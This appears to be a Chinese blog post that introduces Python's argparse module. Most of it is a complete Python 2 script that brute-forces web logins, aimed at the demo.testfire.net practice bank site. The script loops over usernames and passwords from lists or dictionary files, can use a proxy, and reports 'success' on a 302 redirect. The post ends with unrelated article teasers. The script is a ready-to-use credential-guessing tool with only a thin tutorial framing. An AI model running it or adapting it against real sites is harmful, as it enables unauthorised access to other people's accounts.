摘要:一簡介是用于解析命令行參數和選項的標準模塊,用于代替已經過時的模塊。二使用步驟爆破成功爆破失敗批量爆破測試版
一、簡介:
argparse是python用于解析命令行參數和選項的標準模塊,用于代替已經過時的optparse模塊。argparse模塊的作用是用于解析命令行參數,例如python parseTest.py input.txt output.txt --user=name --port=8080。
二、使用步驟:
1:import argparse
2:parser = argparse.ArgumentParser()
3:parser.add_argument()
4:parser.parse_args()
# -*- coding:utf-8 -*- import argparse import requests import sys def login(user, passwd, proxy): if proxy: proxy = {"http": proxy} print proxy headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0", "Referer": "http://demo.testfire.net/bank/login.aspx", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded", } data = { "uid": user, "passw": passwd, "btnSubmit": "Login" } if proxy: html = requests.post("http://demo.testfire.net/bank/login.aspx", proxies=proxy, headers=headers, data=data, allow_redirects=False, verify=False) else: html = requests.post("http://demo.testfire.net/bank/login.aspx", headers=headers, data=data, allow_redirects=False, verify=False) if html.status_code == 302: print u"[+] 爆破成功!!", user + "/" + passwd else: print u"[+] 爆破失敗!!" if __name__ == "__main__": parser = argparse.ArgumentParser(description=u"[+]-----------------NO JS 批量爆破測試-python版-----------------[+]") parser.add_argument("-u", "--user", default=False, dest="user", help="specific one user") parser.add_argument("-p", "--password", default=False, dest="password", help="specific one password") parser.add_argument("-U", default=False, dest="User", help="specific a directory file of users") parser.add_argument("-P", default=False, dest="Password",help="specific a directory file of passwords") parser.add_argument("-D", "--dict", default=False, dest="dict",help="specific a dict file of users and passwords") # parser.add_option("-T", "--target", default=False, help="specific the target dvwa brute force url") parser.add_argument("--proxy", default=False, dest="proxy", help="use a http proxy") args = parser.parse_args() proxys = args.proxy if not ((args.user or args.User) and (args.password or args.Password)) and not args.dict: print parser.parse_args(["-h"]) sys.exit() elif ((args.user or args.User) and (args.password or args.Password)) and args.dict: print parser.parse_args(["-h"]) sys.exit() elif (args.user or args.User) and (args.password or args.Password): users = [] if args.user: users.append(args.user) else: try: user = open(args.User, "r").readlines() for i in user: users.append(i[:-1]) except Exception, e: raise e passwords = [] if args.password: passwords.append(args.password) else: try: password = open(args.Password, "r").readlines() for i in password: passwords.append(i[:-1]) except Exception, e: raise e for u in users: for p in passwords: print proxys login(u, p, proxys) elif args.dict: account_list = [] try: account = open(args.dict, "r").readlines() for D in account: account_list.append(D) except Exception, e: raise e for D in account_list: #time2 = random.randint(2, 90) u = D.split(":")[0].strip() p = D.split(":")[1].strip() login(u, p, proxys)
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/44413.html
摘要:問題與現狀通常情況下,我們都會使用這樣的手段來獲取腳本的輸入參數。 問題與現狀 通常情況下,我們都會使用sys.argv[n]這樣的手段來獲取python腳本的輸入參數。這樣做的缺點如下:1 參數輸入和獲取必須嚴格按照順序2 在獲取參數的同時需要寫一點額外的代碼對輸入參數進行簡單的合法性檢查3 在輸入參數過多(通常情況下項目構建時入參很多,尤其是當各個腳本解耦充分的情況下)導致向其他函...
小編給大家寫這篇文章的主要目的,就是給大家詳細解答,python中的argparse參數模塊的相關知識解答。 前言 help(argparse)查看說明文檔,argparse-Command-line parsing library我們可以知道是一個命令行解析庫,是關于參數解析相關的一個模塊。 示例一:最簡參數對象 先來一段簡單的代碼,快速熟知下這個參數是個啥。 保存為t.py這樣一...
此篇文章主要是闡述了搭建Pythonargv的4種比較常見方式方法,文章內容緊扣主題進行詳盡的基本介紹,具有很強的實用價值,務必的朋友可以學習一下。 序言 小伙伴們好,在平時的撰寫Python腳本制作的過程當中,我們通常需要根據argv傳到某些自變量主要參數,使新項目應用更加靈便便捷。 分別是: 內嵌sys.argv控制模塊 內嵌argparse控制模塊 內嵌getopt模塊 第...
摘要:所以就只能使用實現腳本進行交互,和解耦合。使用的庫和代碼由于命令行執行之后,進程一直在運行,不停的出塊,所以我將出塊的內容寫入到文件中。 背景: 最近因為工作需求在寫自動化測試腳本,主要目的是測試代碼功能的完整性,然而在使用SSHLibrary庫進行遠程SSH交互的時候總是出現問題,比如說遇到需要輸入密碼的交互,總是不能成功,還有遇到一直保持運行并實時輸出的命令,也無法讀取其中的輸出。...
閱讀 1407·2021-11-24 10:20
閱讀 3649·2021-11-24 09:38
閱讀 2294·2021-09-27 13:37
閱讀 2196·2021-09-22 15:25
閱讀 2270·2021-09-01 18:33
閱讀 3488·2019-08-30 15:55
閱讀 1783·2019-08-30 15:54
閱讀 2081·2019-08-30 12:50